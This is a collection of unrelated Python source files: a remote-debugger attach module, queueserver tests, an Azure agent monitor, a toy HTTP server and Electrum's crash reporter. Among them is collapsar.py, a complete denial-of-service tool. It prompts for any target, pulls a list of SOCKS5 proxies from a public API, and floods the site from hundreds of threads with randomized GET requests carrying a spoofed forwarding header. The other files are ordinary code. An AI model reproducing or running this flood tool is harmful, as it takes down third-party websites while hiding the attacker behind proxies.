try:
username = getpass.getuser()
except AttributeError:
username = ''
write_string(client, username)
try:
impl = platform.python_implementation()
except AttributeError:
try:
impl = sys.implementation.name
except AttributeError:
impl = 'Python'
major, minor, micro, release_level, serial = sys.version_info
os_and_arch = platform.system()
if os_and_arch == "":
os_and_arch = sys.platform
try:
if sys.maxsize > 2**32:
os_and_arch += ' 64-bit'
else:
os_and_arch += ' 32-bit'
except AttributeError:
pass
version = '%s %s.%s.%s (%s)' % (impl, major, minor, micro, os_and_arch)
write_string(client, version)
# Don't just drop the connection - let the debugger close it after it finishes reading.
client.recv(1)
elif response == ATCH:
debug_options = vspd.parse_debug_options(read_string(client))
if redirect_output:
debug_options.add('RedirectOutput')
if vspd.DETACHED:
write_bytes(client, ACPT)
try:
pid = os.getpid()
except AttributeError:
pid = 0
write_int(client, pid)
major, minor, micro, release_level, serial = sys.version_info
write_int(client, major)
write_int(client, minor)
write_int(client, micro)
vspd.attach_process_from_socket(client, debug_options, report = True)
vspd.mark_all_threads_for_break(vspd.STEPPING_ATTACH_BREAK)
_attached.set()
client = None
else:
write_bytes(client, RJCT)
elif response == REPL:
if not vspd.DETACHED:
write_bytes(client, ACPT)
vspd.connect_repl_using_socket(client)
client = None
else:
write_bytes(client, RJCT)
except (socket.error, OSError):
pass
finally:
if client is not None:
client.close()
server_thread = threading.Thread(target = server_thread_func)
server_thread.setDaemon(True)
server_thread.start()
frames = []
f = sys._getframe()
while True:
f = f.f_back
if f is None:
break
frames.append(f)
frames.reverse()
cur_thread = vspd.new_thread()
for f in frames:
cur_thread.push_frame(f)
def replace_trace_func():
for f in frames:
f.f_trace = cur_thread.trace_func
replace_trace_func()
sys.settrace(cur_thread.trace_func)
vspd.intercept_threads(for_attach = True)
# Alias for convenience of users of pydevd
settrace = enable_attach
def wait_for_attach(timeout = None):
"""If a PTVS remote debugger is attached, returns immediately. Otherwise,
blocks until a remote debugger attaches to this process, or until the
optional timeout occurs.
Parameters
----------
timeout : float, optional
The timeout for the operation in seconds (or fractions thereof).
"""
if vspd.DETACHED:
_attached.clear()
_attached.wait(timeout)
def break_into_debugger():
"""If a PTVS remote debugger is attached, pauses execution of all threads,
and breaks into the debugger with current thread as active.
"""
if not vspd.DETACHED:
vspd.SEND_BREAK_COMPLETE = thread.get_ident()
vspd.mark_all_threads_for_break()
def is_attached():
"""Returns ``True`` if debugger is attached, ``False`` otherwise."""
return not vspd.DETACHED
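# Usage sketch (illustrative only; assumes this module is importable as `ptvsd`,
# as the docstrings above suggest, and that a compatible PTVS / Visual Studio
# remote debugger connects on the chosen port -- the secret and port below are
# placeholder values):
#
#     import ptvsd
#     ptvsd.enable_attach(secret='my_secret', address=('0.0.0.0', 5678))
#     ptvsd.wait_for_attach(timeout=30)   # block until a debugger attaches (or 30s pass)
#     if ptvsd.is_attached():
#         ptvsd.break_into_debugger()     # pause all threads with the current thread active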
test_manager_options.py
import pytest
import shutil
import os
import glob
import subprocess
import time as ttime
import multiprocessing
from bluesky.callbacks.zmq import RemoteDispatcher
from bluesky_queueserver.manager.profile_ops import gen_list_of_plans_and_devices
from bluesky_queueserver.manager.comms import zmq_single_request
from ._common import (
copy_default_profile_collection,
append_code_to_last_startup_file,
wait_for_condition,
condition_environment_created,
condition_queue_processing_finished,
condition_environment_closed,
)
from ._common import re_manager_cmd # noqa: F401
# User name and user group name used throughout most of the tests.
_user, _user_group = "Testing Script", "admin"
_plan1 = {"name": "count", "args": [["det1", "det2"]], "item_type": "plan"}
_sample_plan1 = """
def simple_sample_plan():
'''
Simple plan for tests.
'''
yield from count([det1, det2])
"""
# fmt: off
@pytest.mark.parametrize("option", ["startup_dir", "profile", "multiple"])
# fmt: on
def test_manager_options_startup_profile(re_manager_cmd, tmp_path, monkeypatch, option): # noqa: F811
pc_path = copy_default_profile_collection(tmp_path)
# Add extra plan. The original set of startup files will not contain this plan.
append_code_to_last_startup_file(pc_path, additional_code=_sample_plan1)
# Generate the new list of allowed plans and devices and reload them
gen_list_of_plans_and_devices(startup_dir=pc_path, file_dir=pc_path, overwrite=True)
# Start manager
if option == "startup_dir":
re_manager_cmd(["--startup-dir", pc_path])
elif option == "profile":
# This option is more complicated: we want to recreate the structure of IPython startup
# directory: <some root dir>/profile_<profile_name>/startup.
root_dir = os.path.split(pc_path)[0]
monkeypatch.setenv("IPYTHONDIR", root_dir)
profile_name = "testing"
startup_path = os.path.join(root_dir, f"profile_{profile_name}", "startup")
os.makedirs(startup_path)
file_pattern = os.path.join(pc_path, "*")
for fl_path in glob.glob(file_pattern):
shutil.move(fl_path, startup_path)
os.rmdir(pc_path)
# We pass only profile name as a parameter.
re_manager_cmd(["--startup-profile", profile_name])
elif option == "multiple":
# Expected to fail if multiple options are selected.
with pytest.raises(TimeoutError, match="RE Manager failed to start"):
re_manager_cmd(["--startup-dir", pc_path, "--startup-profile", "some_name"])
return
else:
assert False, f"Unknown option '{option}'"
# Open the environment (make sure that the environment loads)
resp1, _ = zmq_single_request("environment_open")
assert resp1["success"] is True
assert wait_for_condition(time=10, condition=condition_environment_created)
# Add the plan to the queue (will fail if incorrect environment is loaded)
plan = {"name": "simple_sample_plan", "item_type": "plan"}
params = {"item": plan, "user": _user, "user_group": _user_group}
resp2, _ = zmq_single_request("queue_item_add", params)
assert resp2["success"] is True, f"resp={resp2}"
# Start the queue
resp3, _ = zmq_single_request("queue_start")
assert resp3["success"] is True
assert wait_for_condition(time=10, condition=condition_queue_processing_finished)
# Make sure that the plan was executed
resp4, _ = zmq_single_request("status")
assert resp4["items_in_queue"] == 0
assert resp4["items_in_history"] == 1
# Close the environment
resp5, _ = zmq_single_request("environment_close")
assert resp5["success"] is True, f"resp={resp5}"
assert wait_for_condition(time=5, condition=condition_environment_closed)
monkeypatch.setenv("IPYTHONDIR", "abc")
@pytest.fixture
def zmq_proxy():
cmd = ["bluesky-0MQ-proxy", "5567", "5568"]
p = subprocess.Popen(cmd, universal_newlines=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
yield
p.kill()
@pytest.fixture
def zmq_dispatcher():
# The following code was mostly borrowed from 'bluesky.tests.test_zmq.py' (test_zmq_no_RE)
def make_and_start_dispatcher(queue):
def put_in_queue(name, doc):
print("putting ", name, "in queue")
queue.put((name, doc))
d = RemoteDispatcher("127.0.0.1:5568")
d.subscribe(put_in_queue)
print("REMOTE IS READY TO START")
d.loop.call_later(9, d.stop)
d.start()
queue = multiprocessing.Queue()
dispatcher_proc = multiprocessing.Process(target=make_and_start_dispatcher, daemon=True, args=(queue,))
dispatcher_proc.start()
    ttime.sleep(2)  # Give the dispatcher plenty of time to start.
yield queue
dispatcher_proc.terminate()
dispatcher_proc.join()
def test_manager_acq_with_0MQ_proxy(re_manager_cmd, zmq_proxy, zmq_dispatcher): # noqa: F811
re_manager_cmd(["--zmq-data-proxy-addr", "localhost:5567"])
# Open the environment (make sure that the environment loads)
resp1, _ = zmq_single_request("environment_open")
assert resp1["success"] is True
assert wait_for_condition(time=10, condition=condition_environment_created)
# Add the plan to the queue (will fail if incorrect environment is loaded)
params = {"item": _plan1, "user": _user, "user_group": _user_group}
resp2, _ = zmq_single_request("queue_item_add", params)
assert resp2["success"] is True, f"resp={resp2}"
# Start the queue
resp3, _ = zmq_single_request("queue_start")
assert resp3["success"] is True
assert wait_for_condition(time=10, condition=condition_queue_processing_finished)
# Make sure that the plan was executed
resp4, _ = zmq_single_request("status")
assert resp4["items_in_queue"] == 0
assert resp4["items_in_history"] == 1
# Close the environment
resp5, _ = zmq_single_request("environment_close")
assert resp5["success"] is True, f"resp={resp5}"
assert wait_for_condition(time=5, condition=condition_environment_closed)
# Test if the data was delivered to the consumer.
# Simple test: check if 'start' and 'stop' documents were delivered.
queue = zmq_dispatcher
remote_accumulator = []
while not queue.empty(): # Since queue is used by one process at a time, queue.empty() should work reliably
remote_accumulator.append(queue.get(timeout=2))
assert len(remote_accumulator) >= 2
assert remote_accumulator[0][0] == "start" # Start document
assert remote_accumulator[-1][0] == "stop" # Stop document
# fmt: off
@pytest.mark.parametrize("redis_addr, success", [
("localhost", True),
("localhost:6379", True),
("localhost:6378", False)]) # Incorrect port.
# fmt: on
def test_manager_redis_addr_parameter(re_manager_cmd, redis_addr, success): # noqa: F811
if success:
re_manager_cmd(["--redis-addr", redis_addr])
        # Try to communicate with the server to make sure Redis is configured correctly.
# RE Manager has to access Redis in order to prepare 'status'.
resp1, _ = zmq_single_request("status")
assert resp1["items_in_queue"] == 0
assert resp1["items_in_history"] == 0
else:
with pytest.raises(TimeoutError, match="RE Manager failed to start"):
re_manager_cmd(["--redis-addr", redis_addr])
collapsar.py
import socks
import socket
import requests
import threading
import random
import ssl
import time
from colorama import Fore
print(Fore.RED + """
____ ______ ____ _____ ________ ___ __ __
/ __ \__ __/ ____/____/ __ \____ / ___/____ /_ __/ /_/ | _____/ //_/
/ /_/ / / / / / / ___/ / / / __ \\__ \/ __ `// / / __/ /| |/ ___/ , <
/ ____/ /_/ / /___/ /__/ /_/ / /_/ /__/ / /_/ // / / /_/ ___ / /__/ /| |
/_/ \__, /\____/\___/_____/\____/____/\__,_//_/ \__/_/ |_\___/_/ |_|
/____/""")
print(Fore.WHITE + "Code By GogoZin -2019/8/21")
print("Version 1.2 ")
def opth(): #Open Threads
for _ in range(thr):
x = threading.Thread(target=atk).start()
print('Threads ' + str(g+1) + " Created ")
def clone(): #Get Socks5 List
r = requests.get('https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5&country=all&anonymity=all') #Code By GogoZin
with open('socks5.txt','wb') as f:
f.write(r.content)
print('Sucess Get List !')
def main(): #Setup
global url
global port
global thr
global lsts
global per
global uu
url = str(input('Target (Ex. www.google.com ) : '))
if url =='':
input("Error Input ! Try Again")
return main()
port = str(input('Port (Default Is 80) : '))
if port =='':
port = int(80)
thr = str(input("Threads (1-800 Default Is 300) : "))
if thr =='':
thr = int(300)
else:
thr = int(thr)
per = str(input("CC-Power (1-100 Default Is 70) : "))
if per =='':
per = int(70)
else:
per = int(per)
uu = str(input("Path (Default Is / ) : "))
if uu=='':
uu ='/'
gt = str(input('Get List? (y/n) : '))
if gt =='y':
clone()
else:
pass
lst = str(input('Socks5 List (socks5.txt) : '))
if lst =='':
lst = 'socks5.txt'
lsts = open(lst).readlines()
print('Total Socks5 -> %d'%len(lsts))
time.sleep(2)
opth()
def atk(): #Socks Sent Requests
ua = random.choice(useragent)
proxy = random.choice(lsts).strip().split(":")
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]))
while 1:
try:
s = socks.socksocket()
s.connect((str(url), int(port)))
try:
for _ in range(per):
s.send(str.encode("GET "+uu+"?="+str(random.randint(1,210000000))+" HTTP/1.1\r\nHost: "+url+"\r\nConnection: Keep-Alive\r\nX-Forwarded-For: 1.1.1.1\r\n\r\n"))
s.send(str.encode("GET "+uu+"?="+str(random.randint(1,210000000))+" HTTP/1.1\r\nHost: "+url+"\r\nConnection: Keep-Alive\r\nX-Forwarded-For: 1.1.1.1\r\n\r\n"))
print(Fore.CYAN + "ChallengeCollapsar From ~[" + Fore.WHITE + str(proxy[0])+":"+str(proxy[1])+ Fore.CYAN + "]") #Code By GogoZin
except:
s.close()
except:
s.close()
if __name__=='__main__':
main() #Code By GogoZin
monitor.py
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import threading
import time
import uuid
import azurelinuxagent.common.logger as logger
import azurelinuxagent.common.utils.networkutil as networkutil
from azurelinuxagent.common.cgroupstelemetry import CGroupsTelemetry
from azurelinuxagent.common.errorstate import ErrorState
from azurelinuxagent.common.event import add_event, WALAEventOperation, report_metric, collect_events
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.osutil import get_osutil
from azurelinuxagent.common.protocol.util import get_protocol_util
from azurelinuxagent.common.protocol.healthservice import HealthService
from azurelinuxagent.common.protocol.imds import get_imds_client
from azurelinuxagent.common.utils.restutil import IOErrorCounter
from azurelinuxagent.common.utils.textutil import hash_strings
from azurelinuxagent.common.version import AGENT_NAME, CURRENT_VERSION
def generate_extension_metrics_telemetry_dictionary(schema_version=1.0,
performance_metrics=None):
if schema_version == 1.0:
telemetry_dict = {"SchemaVersion": 1.0}
if performance_metrics:
telemetry_dict["PerfMetrics"] = performance_metrics
return telemetry_dict
else:
return None
def get_monitor_handler():
return MonitorHandler()
class MonitorHandler(object):
EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=1)
TELEMETRY_HEARTBEAT_PERIOD = datetime.timedelta(minutes=30)
# extension metrics period
CGROUP_TELEMETRY_POLLING_PERIOD = datetime.timedelta(minutes=5)
CGROUP_TELEMETRY_REPORTING_PERIOD = datetime.timedelta(minutes=30)
# host plugin
HOST_PLUGIN_HEARTBEAT_PERIOD = datetime.timedelta(minutes=1)
HOST_PLUGIN_HEALTH_PERIOD = datetime.timedelta(minutes=5)
# imds
IMDS_HEARTBEAT_PERIOD = datetime.timedelta(minutes=1)
IMDS_HEALTH_PERIOD = datetime.timedelta(minutes=3)
# Resetting loggers period
RESET_LOGGERS_PERIOD = datetime.timedelta(hours=12)
def __init__(self):
self.osutil = get_osutil()
self.imds_client = None
self.event_thread = None
self.last_reset_loggers_time = None
self.last_event_collection = None
self.last_telemetry_heartbeat = None
self.last_cgroup_polling_telemetry = None
self.last_cgroup_report_telemetry = None
self.last_host_plugin_heartbeat = None
self.last_imds_heartbeat = None
self.protocol = None
self.protocol_util = None
self.health_service = None
self.last_route_table_hash = b''
self.last_nic_state = {}
self.should_run = True
self.heartbeat_id = str(uuid.uuid4()).upper()
self.host_plugin_errorstate = ErrorState(min_timedelta=MonitorHandler.HOST_PLUGIN_HEALTH_PERIOD)
self.imds_errorstate = ErrorState(min_timedelta=MonitorHandler.IMDS_HEALTH_PERIOD)
def run(self):
self.start(init_data=True)
def stop(self):
self.should_run = False
if self.is_alive():
self.event_thread.join()
def init_protocols(self):
# The initialization of ProtocolUtil for the Monitor thread should be done within the thread itself rather
# than initializing it in the ExtHandler thread. This is done to avoid any concurrency issues as each
# thread would now have its own ProtocolUtil object as per the SingletonPerThread model.
self.protocol_util = get_protocol_util()
self.protocol = self.protocol_util.get_protocol()
self.health_service = HealthService(self.protocol.get_endpoint())
def init_imds_client(self):
wireserver_endpoint = self.protocol_util.get_wireserver_endpoint()
self.imds_client = get_imds_client(wireserver_endpoint)
def is_alive(self):
return self.event_thread is not None and self.event_thread.is_alive()
def start(self, init_data=False):
self.event_thread = threading.Thread(target=self.daemon, args=(init_data,))
self.event_thread.setDaemon(True)
self.event_thread.setName("MonitorHandler")
self.event_thread.start()
def collect_and_send_events(self):
"""
Periodically send any events located in the events folder
"""
try:
if self.last_event_collection is None:
self.last_event_collection = datetime.datetime.utcnow() - MonitorHandler.EVENT_COLLECTION_PERIOD
if datetime.datetime.utcnow() >= (self.last_event_collection + MonitorHandler.EVENT_COLLECTION_PERIOD):
try:
event_list = collect_events()
if len(event_list.events) > 0:
self.protocol.report_event(event_list)
except Exception as e:
logger.warn("{0}", ustr(e))
except Exception as e:
logger.warn("Failed to send events: {0}", ustr(e))
self.last_event_collection = datetime.datetime.utcnow()
def daemon(self, init_data=False):
if init_data:
self.init_protocols()
self.init_imds_client()
min_delta = min(MonitorHandler.TELEMETRY_HEARTBEAT_PERIOD,
MonitorHandler.CGROUP_TELEMETRY_POLLING_PERIOD,
MonitorHandler.CGROUP_TELEMETRY_REPORTING_PERIOD,
MonitorHandler.EVENT_COLLECTION_PERIOD,
MonitorHandler.HOST_PLUGIN_HEARTBEAT_PERIOD,
MonitorHandler.IMDS_HEARTBEAT_PERIOD).seconds
while self.should_run:
try:
self.protocol.update_host_plugin_from_goal_state()
self.send_telemetry_heartbeat()
self.poll_telemetry_metrics()
# This will be removed in favor of poll_telemetry_metrics() and it'll directly send the perf data for
# each cgroup.
self.send_telemetry_metrics()
self.collect_and_send_events()
self.send_host_plugin_heartbeat()
self.send_imds_heartbeat()
self.log_altered_network_configuration()
self.reset_loggers()
except Exception as e:
logger.warn("An error occurred in the monitor thread main loop; will skip the current iteration.\n{0}", ustr(e))
time.sleep(min_delta)
def reset_loggers(self):
"""
The loggers maintain hash-tables in memory and they need to be cleaned up from time to time.
For reference, please check azurelinuxagent.common.logger.Logger and
azurelinuxagent.common.event.EventLogger classes
"""
try:
time_now = datetime.datetime.utcnow()
if not self.last_reset_loggers_time:
self.last_reset_loggers_time = time_now
if time_now >= (self.last_reset_loggers_time + MonitorHandler.RESET_LOGGERS_PERIOD):
logger.reset_periodic()
except Exception as e:
logger.warn("Failed to clear periodic loggers: {0}", ustr(e))
self.last_reset_loggers_time = time_now
def send_imds_heartbeat(self):
"""
Send a health signal every IMDS_HEARTBEAT_PERIOD. The signal is 'Healthy' when we have
successfully called and validated a response in the last IMDS_HEALTH_PERIOD.
"""
try:
if self.last_imds_heartbeat is None:
self.last_imds_heartbeat = datetime.datetime.utcnow() - MonitorHandler.IMDS_HEARTBEAT_PERIOD
if datetime.datetime.utcnow() >= (self.last_imds_heartbeat + MonitorHandler.IMDS_HEARTBEAT_PERIOD):
is_currently_healthy, response = self.imds_client.validate()
if is_currently_healthy:
self.imds_errorstate.reset()
else:
self.imds_errorstate.incr()
is_healthy = self.imds_errorstate.is_triggered() is False
logger.verbose("IMDS health: {0} [{1}]", is_healthy, response)
self.health_service.report_imds_status(is_healthy, response)
except Exception as e:
msg = "Exception sending imds heartbeat: {0}".format(ustr(e))
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.ImdsHeartbeat,
is_success=False,
message=msg,
log_event=False)
self.last_imds_heartbeat = datetime.datetime.utcnow()
def send_host_plugin_heartbeat(self):
"""
Send a health signal every HOST_PLUGIN_HEARTBEAT_PERIOD. The signal is 'Healthy' when we have been able to
communicate with HostGAPlugin at least once in the last HOST_PLUGIN_HEALTH_PERIOD.
"""
try:
if self.last_host_plugin_heartbeat is None:
self.last_host_plugin_heartbeat = datetime.datetime.utcnow() - MonitorHandler.HOST_PLUGIN_HEARTBEAT_PERIOD
if datetime.datetime.utcnow() >= (
self.last_host_plugin_heartbeat + MonitorHandler.HOST_PLUGIN_HEARTBEAT_PERIOD):
host_plugin = self.protocol.client.get_host_plugin()
host_plugin.ensure_initialized()
is_currently_healthy = host_plugin.get_health()
if is_currently_healthy:
self.host_plugin_errorstate.reset()
else:
self.host_plugin_errorstate.incr()
is_healthy = self.host_plugin_errorstate.is_triggered() is False
logger.verbose("HostGAPlugin health: {0}", is_healthy)
self.health_service.report_host_plugin_heartbeat(is_healthy)
if not is_healthy:
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.HostPluginHeartbeatExtended,
is_success=False,
message='{0} since successful heartbeat'.format(self.host_plugin_errorstate.fail_time),
log_event=False)
except Exception as e:
msg = "Exception sending host plugin heartbeat: {0}".format(ustr(e))
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.HostPluginHeartbeat,
is_success=False,
message=msg,
log_event=False)
self.last_host_plugin_heartbeat = datetime.datetime.utcnow()
def send_telemetry_heartbeat(self):
try:
if self.last_telemetry_heartbeat is None:
self.last_telemetry_heartbeat = datetime.datetime.utcnow() - MonitorHandler.TELEMETRY_HEARTBEAT_PERIOD
if datetime.datetime.utcnow() >= (self.last_telemetry_heartbeat + MonitorHandler.TELEMETRY_HEARTBEAT_PERIOD):
io_errors = IOErrorCounter.get_and_reset()
hostplugin_errors = io_errors.get("hostplugin")
protocol_errors = io_errors.get("protocol")
other_errors = io_errors.get("other")
if hostplugin_errors > 0 or protocol_errors > 0 or other_errors > 0:
msg = "hostplugin:{0};protocol:{1};other:{2}".format(hostplugin_errors, protocol_errors,
other_errors)
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.HttpErrors,
is_success=True,
message=msg,
log_event=False)
except Exception as e:
logger.warn("Failed to send heartbeat: {0}", ustr(e))
self.last_telemetry_heartbeat = datetime.datetime.utcnow()
def poll_telemetry_metrics(self):
"""
        This method polls the tracked cgroups to get data from the cgroups filesystem and sends the data directly.
        :return: List of Metrics (which are sent to PerfCounterMetrics directly).
"""
try: # If there is an issue in reporting, it should not take down whole monitor thread.
time_now = datetime.datetime.utcnow()
if not self.last_cgroup_polling_telemetry:
self.last_cgroup_polling_telemetry = time_now
if time_now >= (self.last_cgroup_polling_telemetry +
MonitorHandler.CGROUP_TELEMETRY_POLLING_PERIOD):
metrics = CGroupsTelemetry.poll_all_tracked()
if metrics:
for metric in metrics:
report_metric(metric.category, metric.counter, metric.instance, metric.value)
except Exception as e:
logger.warn("Could not poll all the tracked telemetry due to {0}", ustr(e))
self.last_cgroup_polling_telemetry = datetime.datetime.utcnow()
def send_telemetry_metrics(self):
"""
        send_telemetry_metrics will soon be removed in favor of sending performance metrics directly.
:return:
"""
try: # If there is an issue in reporting, it should not take down whole monitor thread.
time_now = datetime.datetime.utcnow()
if not self.last_cgroup_report_telemetry:
self.last_cgroup_report_telemetry = time_now
if time_now >= (self.last_cgroup_report_telemetry + MonitorHandler.CGROUP_TELEMETRY_REPORTING_PERIOD):
performance_metrics = CGroupsTelemetry.report_all_tracked()
if performance_metrics:
message = generate_extension_metrics_telemetry_dictionary(schema_version=1.0,
performance_metrics=performance_metrics)
add_event(name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.ExtensionMetricsData,
is_success=True,
message=ustr(message),
log_event=False)
except Exception as e:
logger.warn("Could not report all the tracked telemetry due to {0}", ustr(e))
self.last_cgroup_report_telemetry = datetime.datetime.utcnow()
def log_altered_network_configuration(self):
"""
Check various pieces of network configuration and, if altered since the last check, log the new state.
"""
raw_route_list = self.osutil.read_route_table()
digest = hash_strings(raw_route_list)
if digest != self.last_route_table_hash:
self.last_route_table_hash = digest
route_list = self.osutil.get_list_of_routes(raw_route_list)
logger.info("Route table: [{0}]".format(",".join(map(networkutil.RouteEntry.to_json, route_list))))
nic_state = self.osutil.get_nic_state()
if nic_state != self.last_nic_state:
description = "Initial" if self.last_nic_state == {} else "Updated"
logger.info("{0} NIC state: [{1}]".format(description, ", ".join(map(str, nic_state.values()))))
self.last_nic_state = nic_state
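# The handlers above share one recurring pattern: remember when an operation last
# ran and perform it again only once its period has elapsed. Below is a minimal
# sketch of that pattern; the helper is illustrative only -- it is not part of the
# agent's API and is not called anywhere in this module.
def _run_if_period_elapsed(last_run, period, operation):
    """Run `operation` if `period` has elapsed since `last_run`; return the updated timestamp."""
    now = datetime.datetime.utcnow()
    if last_run is None:
        # First call: pretend the period has already elapsed so the operation runs immediately.
        last_run = now - period
    if now >= last_run + period:
        try:
            operation()
        except Exception as e:
            logger.warn("Periodic operation failed: {0}", ustr(e))
        last_run = datetime.datetime.utcnow()
    return last_run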
app.py
import os
import signal
import time
import threading
from http.server import (
BaseHTTPRequestHandler,
HTTPServer
)
def fib(n):
a, b = 0, 1
for _ in range(n):
a, b = b, a + b
return a
class MyMsgHandler(BaseHTTPRequestHandler):
def do_GET(self):
try:
message = str(fib(int(self.path.split('/')[1])))
except ValueError as ex:
message = "hi,OK"
self.send_response(200)
self.end_headers()
self.wfile.write(message.encode())
return
def do_HEAD(self):
self.send_response(200)
self.end_headers()
return
def log_message(self, format, *args):
print("{0:6f} - {1}".format(time.time(), *args))
return
class MyApp(object):
def __init__(self):
self.httpd = HTTPServer(('0.0.0.0', 5000), MyMsgHandler)
def run(self):
print('starting server at {0:6f}'.format(time.time()))
self.httpd.serve_forever()
def stop(self):
print('stopping server at {0:6f}'.format(time.time()))
threading.Thread(target=self.httpd.shutdown).start()
if __name__ == '__main__':
def graceful_exit_handler(signum, frame):
app.stop()
app = MyApp()
signal.signal(signal.SIGTERM, graceful_exit_handler)
app.run()
base_crash_reporter.py
# Electrum - lightweight Bitcoin client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import sys
import queue
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger, get_git_version
class BaseCrashReporter(Logger):
report_server = "https://crashhub.electrum.org"
config_key = "show_crash_reporter"
issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
CRASH_TITLE = _('Sorry!')
REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
'useful debug information:')
DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
ASK_CONFIRM_SEND = _("Do you want to send this report?")
USER_COMMENT_PLACEHOLDER = _("Do not enter sensitive/private information here. "
"The report will be visible on the public issue tracker.")
def __init__(self, exctype, value, tb):
Logger.__init__(self)
self.exc_args = (exctype, value, tb)
def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
if constants.net.GENESIS[-4:] not in ["4943", "e26f"] and ".electrum.org" in BaseCrashReporter.report_server:
# Gah! Some kind of altcoin wants to send us crash reports.
raise Exception(_("Missing report URL."))
report = self.get_traceback_info()
report.update(self.get_additional_info())
report = json.dumps(report)
coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
return response
async def do_post(self, proxy, url, data):
async with make_aiohttp_session(proxy) as session:
async with session.post(url, data=data, raise_for_status=True) as resp:
return await resp.text()
def get_traceback_info(self):
exc_string = str(self.exc_args[1])
stack = traceback.extract_tb(self.exc_args[2])
readable_trace = self.__get_traceback_str_to_send()
id = {
"file": stack[-1].filename,
"name": stack[-1].name,
"type": self.exc_args[0].__name__
}
return {
"exc_string": exc_string,
"stack": readable_trace,
"id": id
}
def get_additional_info(self):
args = {
"app_version": get_git_version() or ELECTRUM_VERSION,
"python_version": sys.version,
"os": describe_os_version(),
"wallet_type": "unknown",
"locale": locale.getdefaultlocale()[0] or "?",
"description": self.get_user_description()
}
try:
args["wallet_type"] = self.get_wallet_type()
except:
# Maybe the wallet isn't loaded yet
pass
return args
def __get_traceback_str_to_send(self) -> str:
# make sure that traceback sent to crash reporter contains
# e.__context__ and e.__cause__, i.e. if there was a chain of
# exceptions, we want the full traceback for the whole chain.
return "".join(traceback.format_exception(*self.exc_args))
def _get_traceback_str_to_display(self) -> str:
# overridden in Qt subclass
return self.__get_traceback_str_to_send()
def get_report_string(self):
info = self.get_additional_info()
info["traceback"] = self._get_traceback_str_to_display()
return self.issue_template.format(**info)
def get_user_description(self):
raise NotImplementedError
def get_wallet_type(self) -> str:
raise NotImplementedError
class EarlyExceptionsQueue:
"""Helper singleton for explicitly sending exceptions to crash reporter.
Typically the GUIs set up an "exception hook" that catches all otherwise
uncaught exceptions (which unroll the stack of a thread completely).
This class provides methods to report *any* exception, and queueing logic
that delays processing until the exception hook is set up.
"""
_is_exc_hook_ready = False
_exc_queue = queue.Queue()
@classmethod
def set_hook_as_ready(cls):
if cls._is_exc_hook_ready:
return
cls._is_exc_hook_ready = True
while cls._exc_queue.qsize() > 0:
e = cls._exc_queue.get()
cls._send_exception_to_crash_reporter(e)
@classmethod
def send_exception_to_crash_reporter(cls, e: BaseException):
if cls._is_exc_hook_ready:
cls._send_exception_to_crash_reporter(e)
else:
cls._exc_queue.put(e)
@staticmethod
def _send_exception_to_crash_reporter(e: BaseException):
assert EarlyExceptionsQueue._is_exc_hook_ready
sys.excepthook(type(e), e, e.__traceback__)
send_exception_to_crash_reporter = EarlyExceptionsQueue.send_exception_to_crash_reporter
def trigger_crash():
# note: do not change the type of the exception, the message,
# or the name of this method. All reports generated through this
# method will be grouped together by the crash reporter, and thus
    # will not spam the issue tracker.
class TestingException(Exception):
pass
def crash_test():
raise TestingException("triggered crash for testing purposes")
import threading
t = threading.Thread(target=crash_test)
t.start()
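# Usage sketch (illustrative only; this module is part of the Electrum package and
# uses relative imports, so the snippet is not directly runnable on its own). A GUI
# installs its exception hook, marks the queue as ready, and any exception reported
# before that point is replayed into the hook instead of being lost:
#
#     sys.excepthook = gui_exception_hook         # hypothetical hook installed by the GUI
#     EarlyExceptionsQueue.set_hook_as_ready()    # flush anything queued before this point
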